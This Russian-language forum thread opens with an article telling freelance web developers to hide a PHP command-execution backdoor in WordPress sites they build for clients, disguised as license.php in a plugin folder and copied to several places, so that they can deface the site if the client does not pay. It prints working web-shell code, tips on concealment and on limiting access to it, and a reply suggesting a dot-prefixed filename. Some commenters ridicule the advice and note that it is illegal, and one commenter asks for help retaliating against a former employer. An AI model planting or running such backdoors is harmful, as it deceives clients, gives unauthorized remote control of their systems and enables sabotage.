Статья Оставляем бэкдор для страховки от "нехороших" заказчиков

Всем Салам. Сегодня хотел бы поговорить о фрилансе и как работать без потерь для себя. А именно мы будем защищаться от плохих заказчиков, которые захотят нас кинуть после выполненной работы. Вы скажете, ну чтобы не кидал, бери половину суммы наперед или все сразу. Такое условие, если и прокатит, то только у опытных фрилансеров, у которых множество положительных отзывов. А, если ты новичок и ты хочешь половину суммы, то очень мала вероятность, что на твой ковер леттер, даже среагируют. Поэтому, настоятельно рекомендую писать "оплата после".

Немного теории

У меня, чуть больше 2 лет назад, в среднем, на каждый мой 3 ковер леттер реагировали, и в течении недели я брался за 3, а то и более проектов в зависимости от сложности. Ну наверное вы поняли, сейчас мы говорим о разработке сайтов, веб сервисов, порталов и всего такого, в данном случае на PHP. Сам процесс получается таким: заказчик выбирает вас, вы обговаривается условия, выполняете проект, сдаете ее заказчику и тут самое интересное, если вы поняли, что заказчик вас кинул и чтобы не остаться лоханутым, нужно предпринять определенные меры.


Практика

Предположим вы делаете сайт на WordPress. В процессе выполнения мы и создаем наши мини бэкдорчики и запихиваем в непалевные уголки структуры вордпресса. Самый оптимальный вариант, как по мне, это замаскировать его под license.php в папку какого-нибудь плагина, и на всякий случай еще дублируем в пару других мест.
Сам бэкдор будет выглядит таким образом, код простенький, если ему что-то передается, он принимает и функция system выполняет и отображает.

PHP:
if ( isset( $_REQUEST['cmd'] ) ) {
    echo '<h1>' . 'Будьте честными!' . '</h1>';
    echo '<pre>';
    $cmd = ( $_REQUEST['cmd'] );
    system( $cmd );
    echo '</pre>';
}

Все просто, но все это очень сильно нам может помочь. Так, давайте посмотрим, что мы можем делать с помощью нашего бэкдорчика. Я его разместил в папке плагина akismet. Попробуем посмотреть содержимое папки с помощью команды ls.

Selection_091.jpg


Все отлично получается, все также как и в нашем любимом терминале. Например, сделать дефейс главной страницы, с предупредительной надписью и заказчик точно не захочет, чтобы его сайт впоследствии не был снесен. И теперь будет знать, что кидать не есть хорошо. Можете предложить свои варианты в комментах, как еще можно покарать нечестного.

Еще, нам бы не захотелось, чтобы другие случайно могли получить доступ к нашему бэкдору. Чтобы этого избежать, мы можем реализовать, через .htaccess доступ к файлу по паролю или же дать доступ к файлу только нашему ip. Подробнее можете изучить .

В ином случае, если заказчик вам платит, как и договаривались, то удаляйте бэкдоры, тоже будьте честными. Лично у меня был только 1 случай, когда заказчик, хотел ускользнуть, но этот способ наказания мне помог и справедливость восторжествовала.

На этом думаю завершим. Если у вас были подобные моменты, поделитесь в комментах. Всем удачи!

UPD: Еще несколько, более продвинутых способов, спрятать бэкдорчик.
 
Последнее редактирование:

r0hack

DAG
Platinum
29.09.2017
522
1 089
BIT
0
@obbana, такими «статьями» Интернет завален, да и полезности они уже никакой не несут давно. Тут и корректировка особо не поможет, потому что тема вообще не раскрыта, а главное - нет ответа на вопрос «что мне это даст?». Какой профит? Бэкдор чтобы что? Дефейс? Для школьника сойдёт, более разумный человек либо «доведёт до ума» начатое, либо признает свою ошибку и не будет терять время на всю эту неоплачиваемую ерунду. Время - деньги.
О боже)), этой статье более года, и в данном виде, она помогала много раз и мне и моим знакомым разрабам. А о том, что ее можно доработать и что-то еще добавить, понятное дело, доработать можно все что угодно. Если время - деньги, чего ж вы, столько времени уделили данной записи?)
 
  • Нравится
Реакции: id2746, centr и Глюк

id2746

Green Team
12.11.2016
436
644
BIT
24
license.php - это хорошо
я обычно делаю:
.license.php
вроде точка, а приятно )
 
  • Нравится
Реакции: N1GGA
M

m0ze

О боже)), этой статье более года, и в данном виде, она помогала много раз и мне и моим знакомым разрабам. А о том, что ее можно доработать и что-то еще добавить, понятное дело, доработать можно все что угодно. Если время - деньги, чего ж вы, столько времени уделили данной записи?)
А ещё спасла детей в Африке от голода, да? Конкретики и ответов на вопросы, как я понял, не будет. Ну ок, это тоже показатель. А год - не такой уж срок для такого материала.
 

Глюк

Red Team
03.01.2018
1 185
1 879
BIT
178
А ещё спасла детей в Африке от голода, да? Конкретики и ответов на вопросы, как я понял, не будет. Ну ок, это тоже показатель. А год - не такой уж срок для такого материала.
ждём от вас развёрнутую и подробную статью по данной теме.
 
  • Нравится
Реакции: centr и id2746
M

m0ze

востановит из бэкапа код с бэкдором. Бесконечный цикл
Если заказчик сказочный идиот, то может сработать и 2 раза. Но практика показывает, что если исполнитель подписался на работу без предоплаты, то роль, скажем так, не очень умного отводится уже ему, а не заказчику. Ленивый мониторинг логов и обращение в саппорт решают вопрос со «спасительным бэкдором» на раз. Это даже если не вспоминать про штатное обновление CMS WordPress, которое само может стереть все «хорошо спрятанные», по рекомендациям из материала, бэкдоры.
 

mrOkey

Well-known member
14.11.2017
967
975
BIT
0
Если заказчик сказочный идиот, то может сработать и 2 раза. Но практика показывает, что если исполнитель подписался на работу без предоплаты, то роль, скажем так, не очень умного отводится уже ему, а не заказчику. Ленивый мониторинг логов и обращение в саппорт решают вопрос со «спасительным бэкдором» на раз. Это даже если не вспоминать про штатное обновление CMS WordPress, которое само может стереть все «хорошо спрятанные», по рекомендациям из материала, бэкдоры.
Ну на самом деле элементарное правило предоплаты решает 90% вопросов с недобросовестными заказчиками. Тут спорить нет смысла. Лично я всегда беру 50% и отдаю сорцы только после 100% оплаты. Иначе нахер заказчика. Они там итак разжирели.
 
  • Нравится
Реакции: m0ze и Vertigo

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 999
BIT
3
Ну на самом деле элементарное правило предоплаты решает 90% вопросов с недобросовестными заказчиками. Тут спорить нет смысла. Лично я всегда беру 50% и отдаю сорцы только после 100% оплаты. Иначе нахер заказчика. Они там итак разжирели.
Бро,но это когда есть уже репутация,отзывы,подтверждения возврата финансов если что-то не пошло.
А новичкам какая предоплата? Сейчас правила везде (кроме IT с именем уже) изменились,что предоплата-это риск нарваться на лохотрон.
 
  • Нравится
Реакции: id2746 и mrOkey

mrOkey

Well-known member
14.11.2017
967
975
BIT
0
Бро,но это когда есть уже репутация,отзывы,подтверждения возврата финансов если что-то не пошло.
А новичкам какая предоплата? Сейчас правила везде (кроме IT с именем уже) изменились,что предоплата-это риск нарваться на лохотрон.
Ну уж мы то с тобой знаем, как отзывы и репу сделать )

Если заказчик сказочный идиот, то может сработать и 2 раза. Но практика показывает, что если исполнитель подписался на работу без предоплаты, то роль, скажем так, не очень умного отводится уже ему, а не заказчику. Ленивый мониторинг логов и обращение в саппорт решают вопрос со «спасительным бэкдором» на раз. Это даже если не вспоминать про штатное обновление CMS WordPress, которое само может стереть все «хорошо спрятанные», по рекомендациям из материала, бэкдоры.
я дождусь бэйдж? очень интересен ваш уровень. Если нет бейджа, выложите профиль с хакероне например?
 
  • Нравится
Реакции: Vertigo

id2746

Green Team
12.11.2016
436
644
BIT
24
@m0ze , разводить полемику можно по любому вопросу, аж до усрачки - 3143деть - не мешки ворочать.
и всё тут правильно написано, что оставить хоть какой-то вход лучше, чем ничего не оставить. Возможно это поможет кому-то, разве нет?
Уверен, что даже у такого дотошного (специализда?) как вы, есть дыры в проектах.
 
M

m0ze

Ну на самом деле элементарное правило предоплаты решает 90% вопросов с недобросовестными заказчиками. Тут спорить нет смысла.
А кто спорит? Я, напротив, говорю о том же.

Лично я всегда беру 50% и отдаю сорцы только после 100% оплаты. Иначе нахер заказчика. Они там итак разжирели.
Весьма здравый подход, тут можно только согласиться.

А новичкам какая предоплата?
Отказываюсь верить, что вы всерьёз это написали :) Вылезти из «новичков» весьма просто, если сохранять адекватность, хоть честной работой, хоть набивом репы/проектов и пр. Сейчас это, увы, не гарант и не показатель на фрилансе, кстати говоря.

mrOkey, я вам что-то обещал? И чем тут поможет бейдж ХТБ или какой-то иной, когда речь про конкретный материал и не менее конкретные вопросы автору по содержанию материала? Опять же, автора бейдж никак не спас от написания весьма сомнительного контента, так какова ваша цель с этими пузомерками? Я уже понял, что автор по сути не ответит, вопрос и интерес исчерпаны. Если это ещё одна попытка выйти на риторику в духе «спервадобейся», что тут уже было предпринято ранее, то давайте на этом спич и завершим.

id2746, я уже заметил, что прочитать и подумать - задача для некоторых не из простых, ну да ладно, повторю вопросы.
оставить хоть какой-то вход лучше, чем ничего не оставить
С какой целью? Вход, чтобы что?

Возможно это поможет кому-то, разве нет?
Как? Чем? Вы, как специализд, конкретику дадите, или будете «разводить полемику»?
 

mrOkey

Well-known member
14.11.2017
967
975
BIT
0
@mrOkey, я вам что-то обещал? И чем тут поможет бейдж ХТБ или какой-то иной, когда речь про конкретный материал и не менее конкретные вопросы автору по содержанию материала? Опять же, автора бейдж никак не спас от написания весьма сомнительного контента, так какова ваша цель с этими пузомерками? Я уже понял, что автор по сути не ответит, вопрос и интерес исчерпаны. Если это ещё одна попытка выйти на риторику в духе «спервадобейся», что тут уже было предпринято ранее, то давайте на этом спич и завершим.
Вы новорег с хз каким запасом за плечами. Предоставь вы бэйдж или акк с хаконе стало бы понятнее за ваш бэкграунд. Полемика в стиле "сначаладобейся" разрешилась сама собой, ну да ок. Допустим вы не участвуете в подобых квестах по неясным причинам. Ваши вопросы по материалу упираются в разум заказчика. Бэкдоры (оставленные во время разработки) дают уверенность в том - что код не будет использован. Указал ли автор как сокрыть этот код? Нет. К сожалению, а может и к счастью большая часть аудитории форума - начинающие. Следовательно статью ориентированы на них. Я готов поручиться за компетентность автора в вопросах иб. Мы не зря указали вам на давность материала, так как
а) взгляды автора могли измениться
б) могла измениться сфера
в) произошло и то и другое
и так далее.
 
  • Нравится
Реакции: r0hack
M

m0ze

mrOkey, какое отношение новый аккаунт и бэкграунд участника форума имеют к конкретным вопросам по представленному материалу?

«Ваши вопросы по материалу упираются в разум заказчика» - предположение неверное. Мои вопросы упираются в нелепость написанного, о чём я и написал выше. Ссылку на эту статью пробросили в «Телеге», я зашёл, почитал, удивился.

«Бэкдоры (оставленные во время разработки) дают уверенность в том - что код не будет использован» - не буду придираться к формулировке, но, опять же, я задал конкретные вопросы по описанной ситуации гипотетического «кидалова». Повторять их нет смысла, потому как и ответа на них не будет.

К сожалению, а может и к счастью большая часть аудитории форума - начинающие. Следовательно статью ориентированы на них.
Понятно. Но зачем тогда учить подобному новичков? «Подобному» в данном случае можно воспринять двояко: 1 вариант - это явно вредные советы; 2 вариант - технически реализация хромает на обе ноги, начиная с самой строчки кода, продолжая нелепицей с «интеграцией», заканчивая советами по дополнительной настройке доступа через .htaccess.

Знал, что поднимется вопрос «компетентности», потому не зря указал примечание, что речь про данный материал, не более. Про давность говорить тут как-то нелепо, ибо год для статьи, коих тонна в Интернете, описывающих строчку кода, почти отмечающую двадцатилетие..? Если по меркам форума это норма, тогда окей, буду знать.
 

r0hack

DAG
Platinum
29.09.2017
522
1 089
BIT
0
востановит из бэкапа код с бэкдором. Бесконечный цикл

вы тоже выложите свой беджик, а то так то вы странный
Да эт чувак с 2600 ы.
mrOkey, какое отношение новый аккаунт и бэкграунд участника форума имеют к конкретным вопросам по представленному материалу?

«Ваши вопросы по материалу упираются в разум заказчика» - предположение неверное. Мои вопросы упираются в нелепость написанного, о чём я и написал выше. Ссылку на эту статью пробросили в «Телеге», я зашёл, почитал, удивился.

«Бэкдоры (оставленные во время разработки) дают уверенность в том - что код не будет использован» - не буду придираться к формулировке, но, опять же, я задал конкретные вопросы по описанной ситуации гипотетического «кидалова». Повторять их нет смысла, потому как и ответа на них не будет.


Понятно. Но зачем тогда учить подобному новичков? «Подобному» в данном случае можно воспринять двояко: 1 вариант - это явно вредные советы; 2 вариант - технически реализация хромает на обе ноги, начиная с самой строчки кода, продолжая нелепицей с «интеграцией», заканчивая советами по дополнительной настройке доступа через .htaccess.
Можете удивляться сколько угодно, я описал свой опыт и опыт знакомых разрабов... Многие заказчики прогорали на предоплате, особенно такое бывает на фрилансовых сайтах, но предложи ты им УТП в виде все после оплаты, особенно это хороший шаг для новичков на фрилансе...

Знал, что поднимется вопрос «компетентности», потому не зря указал примечание, что речь про данный материал, не более. Про давность говорить тут как-то нелепо, ибо год для статьи, коих тонна в Интернете, описывающих строчку кода, почти отмечающую двадцатилетие..? Если по меркам форума это норма, тогда окей, буду знать.
На время я указал, потому что к тому моменту только начинал свой путь в ИБ. И да, если бы я сейчас это все писал, то добавил бы некоторые трюки и фичи... а так, сама по себе это основа, которая работает шикарно в ~99% случаев (в ситуациях, которые я и знакомые встречали). И основа, которую может взять себе начинающий разраб и чекать в добрых целях, а по желанию и новоротить. Удачи вам)
 
G

Geka

Рубрика «Вредные советы», отлично. Если не придираться к подходу «как из одной найденной строчки кода сделать статью для codeby.net», то к автору такие вопросы:


Как именно поможет маленький бэкдор «не остаться лоханутым»? Он как-то перечислит вам деньги за работу? Нет. Разок удалите всё под корень, заказчик восстановится из бэкапа и всё. Если дядя попадётся упёртый и с крупным проектом, то ещё может и в полицию обратиться, т.к. без договора все ваши «фрилансы» юр. силы не имеют, а вот 272 УК РФ становится более чем реальной.


Выдаёте свою неопытность во второй раз. Сам приведённый код уже является палевом, которое легко детектится. Вы даже не посоветовали как-то видоизменить/обфусцировать его, чтобы хоть как-то его скрыть.


Даже если не придираться к формулировке, то что делать, если для сторонних скриптов выполнение функции system() закрыто или фильтруется WAF'ом?


Повторю вопрос: как поможет? Если не обеспечивает возвращение долга по оплате работы, то это просто детская шалость скрипт-кидди, нашедшего «код бэкдора на PHP» и не знающего что с ним, собственно, делать, кроме разового дефейса. Конечно, может быть ваш заказчик фантастический идиот, который после первого дефейса ничего не поймёт, но это уже больше именно на фантастику похоже. Вы пытаетесь обмануть обманщика, а на этом поле он у себя дома и вас легко переиграет. Выдали неопытность в четвёртый раз.


Выдали свою неопытность в пятый раз. В папке плагина, серьёзно? То есть вы ставите свою «защиту» туда, где она автоматически слетит при штатном обновлении CMS и/или плагинов?


А потом все от счастья закружатся в индийском танце, да? После дефейса у вас уже доступ будет закрыт с вероятностью в 99%, т.к. в системе вы никоим образом не закрепились.


Опишите, пожалуйста, сценарий, при котором кто-то бы мог получить доступ к этому бэкдору.


Лучше сразу паспортные данные и номер телефона оставьте, так будет быстрее. Более нелепых и вредных советов в этой абсурдной ситуации дать, видимо, невозможно. То есть, иными словами, вы не только предлагаете нарушать закон, но и никак не закрепились в системе, поставили свои бэкдоры под самоуничтожение (в примере с CMS WordPress), так ещё и предлагаете наследить дополнительно в файле .htaccess (а если там NginX + PHP-FPM?) и даже оставить там свой IP. Вы нормально себя чувствуете?

Про добавление в код мусора вроде
PHP:
echo '<h1>' . 'Будьте честными!' . '</h1>';
я вообще промолчу. Это, видимо, «авторское».

З.Ы.: «неопытность» конкретно в затронутой теме и исходя из текста материала.

«Кодбай» потихоньку превращается в сборник копипасты из Интернета?
Здравствуйте, вы очень подробно и аргументированно озвучили свою точку зрения.Скажите,вы против бэдкоров совсем или они должны быть другими?Как вы находите выход из ситуации,описанной в статье?Очень интересно услышать ваш ответ
 
M

m0ze

Geka, привет. Точку зрения, касательно обсуждаемой ситуации, я озвучил скорее тезисно, чем подробно. Я не против каких-то "мер", в т.ч. бэкдоров. Но! Бэкдор - это инструмент, и надо понимать для чего и как его использовать, в каких ситуациях и против кого.

Касательно выхода из ситуации. Так уж получилось, что продолжение эта тема получила уже вот в этом материале за авторством centr.
 
  • Нравится
Реакции: Geka
G

Geka

Geka, привет. Точку зрения, касательно обсуждаемой ситуации, я озвучил скорее тезисно, чем подробно. Я не против каких-то "мер", в т.ч. бэкдоров. Но! Бэкдор - это инструмент, и надо понимать для чего и как его использовать, в каких ситуациях и против кого.

Касательно выхода из ситуации. Так уж получилось, что продолжение эта тема получила уже вот в этом материале за авторством centr.
Спасибо за ссылку,почитаю
 

killerguy

Green Team
10.08.2018
21
14
BIT
0
А я вот попал на месяц работы, но я в проекте работал, в офисе, условия оказались совсем не те что озвучивались, я естественно попросил расчёт, меня послали на **й, сказали не нравится, двери там, и я понимаю что не оставил никакой лазейки потому что даже не предполагал такого исхода, вот сейчас думаю как наказать этих уродов, если кто готов помочь пишите в личку, у меня в одиночку не получается пока ничего сделать
[automerge]1522898710[/automerge]
А должны они мне $3000
[automerge]1522898823[/automerge]
Учитывая то что у меня съёмная квартира и 4 детей , мне было ооооочень тяжело выбраться из ямы в которую они меня загнали.
Не подскажете компанию?
 
  • Нравится
Реакции: Geka
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!